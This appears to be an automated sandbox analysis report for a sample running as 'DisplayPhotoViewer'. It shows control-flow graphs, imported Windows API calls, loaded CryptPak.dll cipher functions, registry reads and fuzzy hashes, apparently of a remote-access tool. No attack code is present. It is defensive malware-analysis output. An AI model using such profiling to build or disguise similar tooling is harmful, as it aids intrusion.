                                                                                                    control_flow_graph 2014 110270f0-1102710d 2015 11027113-11027142 2014->2015 2016 110277d8-110277df 2014->2016 2017 110271d0-11027218 GetModuleFileNameA _strrchr call 111592b7 2015->2017 2018 11027148-1102714e 2015->2018 2019 110277f1-110277f5 2016->2019 2020 110277e1-110277ea 2016->2020 2027 1102721d 2017->2027 2022 11027150-11027158 2018->2022 2024 110277f7-11027809 call 11157561 2019->2024 2025 1102780a-1102781e call 11157561 2019->2025 2020->2019 2023 110277ec 2020->2023 2022->2022 2028 1102715a-11027160 2022->2028 2023->2019 2031 11027220-1102722a 2027->2031 2032 11027163-11027168 2028->2032 2034 11027230-11027233 2031->2034 2035 110277cf-110277d7 2031->2035 2032->2032 2036 1102716a-11027174 2032->2036 2034->2035 2037 11027239-11027247 call 110255e0 2034->2037 2035->2016 2038 11027191-11027197 2036->2038 2039 11027176-1102717d 2036->2039 2047 11027755-1102776a call 11159081 2037->2047 2048 1102724d-11027260 call 11158647 2037->2048 2040 11027198-1102719e 2038->2040 2042 11027180-11027186 2039->2042 2040->2040 2043 110271a0-110271ce call 111592b7 2040->2043 2042->2042 2045 11027188-1102718e 2042->2045 2043->2031 2045->2038 2047->2035 2056 11027770-110277ca 2047->2056 2054 11027262-11027265 2048->2054 2055 1102726b-11027293 call 11025450 call 110255e0 2048->2055 2054->2047 2054->2055 2055->2047 2061 11027299-110272b6 call 110256d0 call 110255e0 2055->2061 2056->2035 2066 110276c5-110276cc 2061->2066 2067 110272bc 2061->2067 2068 110276f2-110276f9 2066->2068 2069 110276ce-110276d1 2066->2069 2070 110272c0-110272e0 call 11025450 2067->2070 2072 11027711-11027718 2068->2072 2073 110276fb-11027701 2068->2073 2069->2068 2071 110276d3-110276da 2069->2071 2082 110272e2-110272e5 2070->2082 2083 11027316-11027319 2070->2083 2075 110276e0-110276f0 2071->2075 2077 1102771a-11027725 2072->2077 2078 11027728-1102772f 2072->2078 2076 11027707-1102770f 2073->2076 2075->2068 2075->2075 2076->2072 2076->2076 2077->2078 2080 11027731-1102773b 2078->2080 2081 1102773e-11027745 2078->2081 2080->2081 2081->2047 2086 11027747-11027752 2081->2086 2084 110272e7-110272ee 2082->2084 2085 110272fe-11027301 2082->2085 2087 110276ae-110276bf call 110255e0 2083->2087 2088 1102731f-11027332 call 11159410 2083->2088 2089 110272f4-110272fc 2084->2089 2085->2087 2090 11027307-11027311 2085->2090 2086->2047 2087->2066 2087->2070 2088->2087 2095 11027338-11027354 call 11159d1c 2088->2095 2089->2085 2089->2089 2090->2087 2098 11027356-1102735c 2095->2098 2099 1102736f-11027385 call 11159d1c 2095->2099 2100 11027360-11027368 2098->2100 2104 11027387-1102738d 2099->2104 2105 1102739f-110273b5 call 11159d1c 2099->2105 2100->2100 2103 1102736a 2100->2103 2103->2087 2106 11027390-11027398 2104->2106 2110 110273b7-110273bd 2105->2110 2111 110273cf-110273e5 call 11159d1c 2105->2111 2106->2106 2108 1102739a 2106->2108 2108->2087 2112 110273c0-110273c8 2110->2112 2116 110273e7-110273ed 2111->2116 2117 110273ff-11027415 call 11159d1c 2111->2117 2112->2112 2114 110273ca 2112->2114 2114->2087 2119 110273f0-110273f8 2116->2119 2122 11027417-1102741d 2117->2122 2123 1102742f-11027445 call 11159d1c 2117->2123 2119->2119 2121 110273fa 2119->2121 2121->2087 2124 11027420-11027428 2122->2124 2128 11027447-1102744d 2123->2128 2129 1102745f-11027475 call 11159d1c 2123->2129 2124->2124 2126 1102742a 2124->2126 2126->2087 2130 11027450-11027458 2128->2130 2134 11027477-1102747d 2129->2134 2135 1102748f-110274a5 call 11159d1c 2129->2135 2130->2130 2132 1102745a 2130->2132 2132->2087 2136 11027480-11027488 2134->2136 2140 110274a7-110274ad 2135->2140 2141 110274bf-110274d5 call 11159d1c 2135->2141 2136->2136 2138 1102748a 2136->2138 2138->2087 2142 110274b0-110274b8 2140->2142 2146 110274d7-110274dd 2141->2146 2147 110274ef-11027505 call 11159d1c 2141->2147 2142->2142 2144 110274ba 2142->2144 2144->2087 2148 110274e0-110274e8 2146->2148 2152 11027507-1102750d 2147->2152 2153 1102751f-11027535 call 11159d1c 2147->2153 2148->2148 2151 110274ea 2148->2151 2151->2087 2154 11027510-11027518 2152->2154 2158 11027537-1102753d 2153->2158 2159 1102754f-11027565 call 11159d1c 2153->2159 2154->2154 2156 1102751a 2154->2156 2156->2087 2160 11027540-11027548 2158->2160 2164 11027586-1102759c call 11159d1c 2159->2164 2165 11027567-1102756d 2159->2165 2160->2160 2162 1102754a 2160->2162 2162->2087 2170 110275b3-110275c9 call 11159d1c 2164->2170 2171 1102759e 2164->2171 2167 11027577-1102757f 2165->2167 2167->2167 2169 11027581 2167->2169 2169->2087 2176 110275e0-110275f6 call 11159d1c 2170->2176 2177 110275cb 2170->2177 2172 110275a4-110275ac 2171->2172 2172->2172 2174 110275ae 2172->2174 2174->2087 2182 11027617-1102762d call 11159d1c 2176->2182 2183 110275f8-110275fe 2176->2183 2178 110275d1-110275d9 2177->2178 2178->2178 2180 110275db 2178->2180 2180->2087 2188 1102764f-11027665 call 11159d1c 2182->2188 2189 1102762f-1102763f 2182->2189 2184 11027608-11027610 2183->2184 2184->2184 2186 11027612 2184->2186 2186->2087 2194 11027667-1102766d 2188->2194 2195 1102767c-11027692 call 11159d1c 2188->2195 2190 11027640-11027648 2189->2190 2190->2190 2192 1102764a 2190->2192 2192->2087 2196 11027670-11027678 2194->2196 2195->2087 2200 11027694-1102769a 2195->2200 2196->2196 2199 1102767a 2196->2199 2199->2087 2201 110276a4-110276ac 2200->2201 2201->2087 2201->2201
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6F901370,?,0000001A), ref: 110271DD
                                                                                                    • _strrchr.LIBCMT ref: 110271EC
                                                                                                      • Part of subcall function 11159D1C: __stricmp_l.LIBCMT ref: 11159D59
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                    • API String ID: 1609618855-357498123
                                                                                                    • Opcode ID: 63d8dd5fead9e0649ce10dd2ca09b8f44365e9f9cca71fc1be97b356fef316e2
                                                                                                    • Instruction ID: 2674c73fd36b65bbcd86ca3171f9a7e695c26ead41fc2bd3ff21a573544fd277
                                                                                                    • Opcode Fuzzy Hash: 63d8dd5fead9e0649ce10dd2ca09b8f44365e9f9cca71fc1be97b356fef316e2
                                                                                                    • Instruction Fuzzy Hash: 7B120A78D056A68FDB66CF28CC84BD8B7B1AB2A30CF5040E9CCE557201EB71558ACF52
                                                                                                    Function 11081E80 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2202 11081e80-11081e9d call 11081e70 2205 11081e9f-11081eaf call 11157561 2202->2205 2206 11081eb0-11081ec0 call 1113aeb0 2202->2206 2211 11081ec2-11081eca 2206->2211 2211->2211 2212 11081ecc-11081ed2 2211->2212 2213 11081ed3-11081ed9 2212->2213 2213->2213 2214 11081edb-11081f12 LoadLibraryA 2213->2214 2215 11081f79-11081f8e GetProcAddress 2214->2215 2216 11081f14-11081f1b 2214->2216 2217 1108201c-1108202d call 11157561 2215->2217 2218 11081f94-11081fa3 GetProcAddress 2215->2218 2219 11081f1d-11081f6e GetModuleFileNameA call 1107d210 LoadLibraryA 2216->2219 2220 11081f70-11081f73 2216->2220 2218->2217 2222 11081fa5-11081fb4 GetProcAddress 2218->2222 2219->2220 2220->2215 2220->2217 2222->2217 2225 11081fb6-11081fc5 GetProcAddress 2222->2225 2225->2217 2227 11081fc7-11081fd6 GetProcAddress 2225->2227 2227->2217 2228 11081fd8-11081fe7 GetProcAddress 2227->2228 2228->2217 2229 11081fe9-11081ff8 GetProcAddress 2228->2229 2229->2217 2230 11081ffa-11082009 GetProcAddress 2229->2230 2230->2217 2231 1108200b-1108201a GetProcAddress 2230->2231 2231->2217 2232 1108202e-11082043 call 11157561 2231->2232
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11081F0C
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11081F2A
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11081F6C
                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11081F87
                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11081F9C
                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11081FAD
                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11081FBE
                                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11081FCF
                                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11081FE0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                    • API String ID: 2201880244-3035937465
                                                                                                    • Opcode ID: 37df38a3cffaa653d28c33417d16f14043aebe152239492477c98f6f420c671b
                                                                                                    • Instruction ID: e6f83acf43405f238bea454260f9dfef01cad1b13766f442e244b07dfca12fa4
                                                                                                    • Opcode Fuzzy Hash: 37df38a3cffaa653d28c33417d16f14043aebe152239492477c98f6f420c671b
                                                                                                    • Instruction Fuzzy Hash: 2851DD70A0430ADFD710DF39C890AAAFBE9AF54304B0189AEEC95C7242EA70E441CF55
                                                                                                    Function 1102EE87 Relevance: 37.2, APIs: 13, Strings: 8, Instructions: 441registrylibraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2235 1102ee87-1102ee9c 2237 1102eea2-1102eeab 2235->2237 2238 1102f63c-1102f669 call 110e66f0 call 11157561 2235->2238 2239 1102eeb1-1102eeb8 2237->2239 2240 1102ef79-1102ef8c 2237->2240 2239->2240 2242 1102eebe-1102eee0 RegOpenKeyExA 2239->2242 2248 1102ef92-1102ef95 2240->2248 2249 1102f067-1102f071 2240->2249 2245 1102ef73 2242->2245 2246 1102eee6-1102ef13 call 11139370 2242->2246 2245->2240 2263 1102ef66-1102ef6d RegCloseKey 2246->2263 2264 1102ef15-1102ef32 call 11158647 call 11159a6a 2246->2264 2254 1102ef97-1102efac 2248->2254 2255 1102efda 2248->2255 2250 1102efb2-1102efd0 call 111077a0 call 11101110 2249->2250 2251 1102f077-1102f08d call 111077a0 2249->2251 2279 1102efd5-1102f1d3 2250->2279 2267 1102f093-1102f09a call 110f31f0 2251->2267 2268 1102f1cd-1102f1cf 2251->2268 2254->2250 2257 1102efe4-1102efe7 2255->2257 2258 1102efdc-1102efe2 2255->2258 2257->2249 2262 1102efe9-1102f004 GetModuleHandleA GetProcAddress 2257->2262 2258->2250 2269 1102f006-1102f011 GetNativeSystemInfo 2262->2269 2270 1102f01f-1102f032 2262->2270 2263->2245 2307 1102ef46-1102ef49 2264->2307 2308 1102ef34-1102ef44 call 11159a6a 2264->2308 2278 1102f1d8-1102f21c GetStockObject GetObjectA 2267->2278 2268->2278 2269->2270 2274 1102f013-1102f018 2269->2274 2275 1102f038 2270->2275 2276 1102f12f-1102f132 2270->2276 2274->2270 2283 1102f102-1102f109 2275->2283 2284 1102f03e-1102f046 2275->2284 2280 1102f134-1102f13d 2276->2280 2281 1102f158 2276->2281 2287 1102f228-1102f38f SetErrorMode * 2 call 111077a0 call 11026e70 call 111077a0 call 11026e70 InterlockedExchange call 111077a0 call 11085e20 GetACP _sprintf call 1115ac63 call 11138f10 call 11138f20 call 111077a0 call 1105d0a0 2278->2287 2288 1102f21e 2278->2288 2279->2278 2290 1102f14e-1102f151 2280->2290 2291 1102f13f-1102f149 2280->2291 2281->2250 2292 1102f15e-1102f165 2281->2292 2296 1102f120-1102f12a 2283->2296 2297 1102f10b-1102f11b 2283->2297 2293 1102f048-1102f04f 2284->2293 2294 1102f09f-1102f0a2 2284->2294 2350 1102f391 2287->2350 2351 1102f397-1102f39d 2287->2351 2288->2287 2290->2292 2300 1102f153 2290->2300 2291->2250 2303 1102f167-1102f171 2292->2303 2304 1102f17c-1102f186 2292->2304 2305 1102f051-1102f05b 2293->2305 2306 1102f0be-1102f0ce 2293->2306 2301 1102f0d0-1102f0d3 2294->2301 2302 1102f0a4-1102f0aa 2294->2302 2296->2250 2298 1102f061 2297->2298 2298->2249 2300->2250 2301->2283 2313 1102f0d5-1102f0dc 2301->2313 2302->2306 2312 1102f0ac-1102f0bc 2302->2312 2303->2304 2304->2268 2305->2298 2306->2298 2309 1102ef4b 2307->2309 2310 1102ef4c-1102ef58 call 11158647 2307->2310 2308->2307 2309->2310 2310->2263 2322 1102ef5a-1102ef60 2310->2322 2312->2298 2318 1102f0f3-1102f0fd 2313->2318 2319 1102f0de-1102f0ee 2313->2319 2318->2250 2319->2298 2322->2263 2350->2351 2352 1102f3d9-1102f441 call 111077a0 call 1111d1b0 call 1110c650 2351->2352 2353 1102f39f-1102f3b5 call 111077a0 2351->2353 2371 1102f447-1102f45d call 111077a0 2352->2371 2372 1102f4ce-1102f4d0 2352->2372 2358 1102f3b7-1102f3cc call 1105cd10 2353->2358 2359 1102f3ce 2353->2359 2362 1102f3d0-1102f3d4 2358->2362 2359->2362 2362->2352 2380 1102f468 2371->2380 2381 1102f45f-1102f466 call 11083fb0 2371->2381 2374 1102f4e2-1102f4e9 call 1100d4c0 2372->2374 2375 1102f4d2-1102f4df call 1111d2a0 call 11157121 2372->2375 2374->2238 2383 1102f4ef-1102f503 call 1100d1e0 call 1113c600 2374->2383 2375->2374 2385 1102f46a-1102f48c call 111077a0 2380->2385 2381->2385 2383->2238 2393 1102f4a3 2385->2393 2394 1102f48e-1102f4a1 call 110583d0 2385->2394 2397 1102f4a5-1102f4cc call 11107890 call 110587c0 call 11025f00 2393->2397 2394->2397 2397->2374
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,?,00000001,?), ref: 1102EED8
                                                                                                      • Part of subcall function 11139370: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110784B,75BF8400,?,?,1113B43F,00000000,CSDVersion,00000000,00000000,?), ref: 11139390
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 1102EF6D
                                                                                                      • Part of subcall function 11159A6A: __isdigit_l.LIBCMT ref: 11159A8F
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1102EFF5
                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 1102EFFC
                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 1102F00A
                                                                                                    • GetStockObject.GDI32(0000000D), ref: 1102F1E3
                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 1102F1F3
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F231
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1102F237
                                                                                                    • InterlockedExchange.KERNEL32(0BA62AA0,00001388), ref: 1102F2B8
                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 1102F2EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorModeObject$AddressCloseExchangeHandleInfoInterlockedModuleNativeOpenProcQueryStockSystemValue__isdigit_l
                                                                                                    • String ID: .%d$3$CurrentVersion$Error %s unloading audiocap dll$GetNativeSystemInfo$SOFTWARE\Microsoft\Windows NT\CurrentVersion$kernel32.dll$pcicl32
                                                                                                    • API String ID: 3742979543-181536097
                                                                                                    • Opcode ID: 07d949fd793ad3154d2041483b58dc825fac91b79b7e6eeac6ebf98cdf3f22b2
                                                                                                    • Instruction ID: 457bdd8ea33ed7f851370b106bdf202f4828996bada1dd751398929caa3caa22
                                                                                                    • Opcode Fuzzy Hash: 07d949fd793ad3154d2041483b58dc825fac91b79b7e6eeac6ebf98cdf3f22b2
                                                                                                    • Instruction Fuzzy Hash: 3BF15BB1D043659AEB52CBB4CC84B9DFBF4AB4534CF9401EEE849A3241EB755A80CB53
                                                                                                    Function 11137C50 Relevance: 35.7, APIs: 3, Strings: 17, Instructions: 672registryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2406 11137c50-11137c86 2407 11137c88-11137c8a 2406->2407 2408 11137c8f-11137ca4 call 111077a0 2406->2408 2409 111385b0-111385cb call 11157561 2407->2409 2414 11137cd0-11137cd2 2408->2414 2415 11137ca6-11137cce call 1105d0a0 2408->2415 2417 11137cd8-11137d07 call 1105d820 2414->2417 2415->2417 2422 11137d10-11137d1d call 111391c0 2417->2422 2423 11137d09-11137d0a RegCloseKey 2417->2423 2426 11137d24-11137d45 call 1113b0a0 call 111395a0 2422->2426 2427 11137d1f 2422->2427 2423->2422 2432 11137d57-11137d6d call 111077a0 2426->2432 2433 11137d47-11137d52 call 1105ee80 2426->2433 2427->2426 2437 11137d82 2432->2437 2438 11137d6f-11137d80 call 1105cd10 2432->2438 2433->2432 2440 11137d88-11137da2 call 111077a0 2437->2440 2438->2440 2444 11137db7 2440->2444 2445 11137da4-11137db5 call 1105cd10 2440->2445 2447 11137dbd-11137dd7 call 111077a0 2444->2447 2445->2447 2451 11137dd9-11137dea call 1105cd10 2447->2451 2452 11137dec 2447->2452 2454 11137df2-11137e39 call 1105c890 * 2 2451->2454 2452->2454 2460 11137e40 2454->2460 2461 11137e47-11137e4e 2460->2461 2462 11137e50-11137e57 2461->2462 2463 11137e5d-11137e65 2461->2463 2462->2463 2464 1113815a 2462->2464 2465 11137e67-11137e6d 2463->2465 2466 11137e89-11137e90 2463->2466 2467 11138160-11138162 2464->2467 2465->2466 2468 11137e6f-11137e7c call 1105c920 2465->2468 2469 11137e92-11137e99 2466->2469 2470 11137eb5-11137ec3 2466->2470 2471 11138168-11138183 call 11059e50 2467->2471 2472 1113853d-11138545 2467->2472 2492 11137e87 2468->2492 2493 11137e7e-11137e85 2468->2493 2469->2470 2476 11137e9b-11137ea8 call 1105c920 2469->2476 2473 11137ec5-11137ec7 2470->2473 2474 11137ecd-11137ecf 2470->2474 2501 11138189-111381b0 call 1105c890 call 1105c920 2471->2501 2502 111382ce-11138315 call 1105d070 call 11067550 call 11063910 2471->2502 2481 11138547-1113854b 2472->2481 2482 1113854f-11138557 2472->2482 2473->2464 2473->2474 2478 11137ed1-11137ed3 2474->2478 2479 11137f1d-11137f1f 2474->2479 2494 11137eb3 2476->2494 2495 11137eaa-11137eb1 2476->2495 2490 11137ed5-11137edb 2478->2490 2491 11137eef-11137ef1 2478->2491 2485 11137f21-11137f26 2479->2485 2486 11137f28-11137f2a 2479->2486 2481->2482 2487 11138561-11138569 2482->2487 2488 11138559-1113855d 2482->2488 2496 11137f4b-11137f65 call 1107d280 2485->2496 2497 11137f33-11137f49 call 1107d280 2486->2497 2498 11137f2c-11137f31 2486->2498 2499 11138573-111385ae call 1105c770 * 2 call 11157121 2487->2499 2500 1113856b-1113856f 2487->2500 2488->2487 2490->2491 2503 11137edd-11137eea call 1113c600 2490->2503 2504 11137ef7-11137efe 2491->2504 2505 11138145-11138158 call 1113c600 2491->2505 2492->2466 2493->2466 2494->2470 2495->2470 2523 11137f6b 2496->2523 2524 1113806c-111380a9 call 11059f40 call 11129970 2496->2524 2497->2496 2498->2496 2499->2409 2500->2499 2535 111381e3-1113820a call 1105c890 call 1105c920 2501->2535 2536 111381b2-111381e1 call 1113c600 call 1105c920 2501->2536 2548 11138343-11138378 EnterCriticalSection call 1105c550 call 1105d070 2502->2548 2549 11138317 2502->2549 2503->2460 2504->2505 2507 11137f04-11137f18 call 1113c600 2504->2507 2505->2467 2507->2461 2530 11137f75 2523->2530 2531 11137f6d-11137f6f 2523->2531 2561 111380b1-111380b8 2524->2561 2562 111380ab 2524->2562 2538 11137f7b-11137f81 2530->2538 2539 11137ffe-1113803b call 11059f40 call 11129970 2530->2539 2531->2524 2531->2530 2579 11138241-11138268 call 1105c890 call 1105c920 2535->2579 2580 1113820c 2535->2580 2536->2535 2546 11137f87-11137f8b 2538->2546 2577 11138043-1113804a 2539->2577 2578 1113803d 2539->2578 2554 11137fa7-11137fa9 2546->2554 2555 11137f8d-11137f8f 2546->2555 2596 1113838a-1113839b LeaveCriticalSection 2548->2596 2597 1113837a-11138387 call 11029350 2548->2597 2559 11138320-1113832e call 1104cbe0 2549->2559 2560 11137fac-11137fae 2554->2560 2556 11137fa3-11137fa5 2555->2556 2557 11137f91-11137f97 2555->2557 2556->2560 2557->2554 2567 11137f99-11137fa1 2557->2567 2587 11138333 2559->2587 2588 11138330-11138331 2559->2588 2570 11137ff2-11137ff9 2560->2570 2571 11137fb0-11137fea call 11059f40 call 11129970 2560->2571 2574 111380ca 2561->2574 2575 111380ba-111380c8 2561->2575 2562->2561 2567->2546 2567->2556 2583 111380d1 2570->2583 2571->2570 2618 11137fec 2571->2618 2574->2583 2575->2574 2575->2583 2592 1113805c 2577->2592 2593 1113804c-1113805a 2577->2593 2578->2577 2626 111382a1-111382c9 call 1105c770 * 3 2579->2626 2627 1113826a 2579->2627 2586 11138210-1113823f call 1113c600 call 1105c920 2580->2586 2585 111380d8-111380da 2583->2585 2594 111380fe-11138116 call 1107d330 2585->2594 2595 111380dc-111380de 2585->2595 2586->2579 2600 11138334-11138341 call 11063910 2587->2600 2588->2600 2598 11138063-1113806a 2592->2598 2593->2592 2593->2598 2623 1113811b-11138133 call 1107d330 2594->2623 2624 11138118 2594->2624 2595->2594 2603 111380e0-111380f8 call 1107d280 2595->2603 2610 111383e0-1113845d call 1112b5d0 call 110ca840 * 2 call 110c90c0 2596->2610 2611 1113839d-1113839f 2596->2611 2597->2596 2598->2585 2600->2548 2600->2559 2603->2461 2603->2594 2661 11138463-11138480 call 110ca440 2610->2661 2662 1113850b-11138537 call 110c9920 * 2 call 110675b0 2610->2662 2611->2610 2615 111383a1-111383c3 call 1113c600 call 11133750 call 11137810 2611->2615 2615->2610 2653 111383c5-111383dd call 1113c600 call 110258f0 2615->2653 2618->2570 2643 11138135-11138138 2623->2643 2644 1113813d-11138140 2623->2644 2624->2623 2626->2502 2629 11138270-1113829f call 1113c600 call 1105c920 2627->2629 2629->2626 2643->2461 2644->2461 2653->2610 2671 11138482-11138496 call 11027f50 2661->2671 2672 11138499-111384af call 1107d280 2661->2672 2662->2472 2671->2672 2678 111384b1-111384c9 call 110093d0 call 1107d140 2672->2678 2679 111384ea-11138504 2672->2679 2678->2679 2686 111384cb-111384e8 call 110093d0 2678->2686 2683 11138509 2679->2683 2683->2662 2686->2683
                                                                                                    APIs
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 11137D0A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close
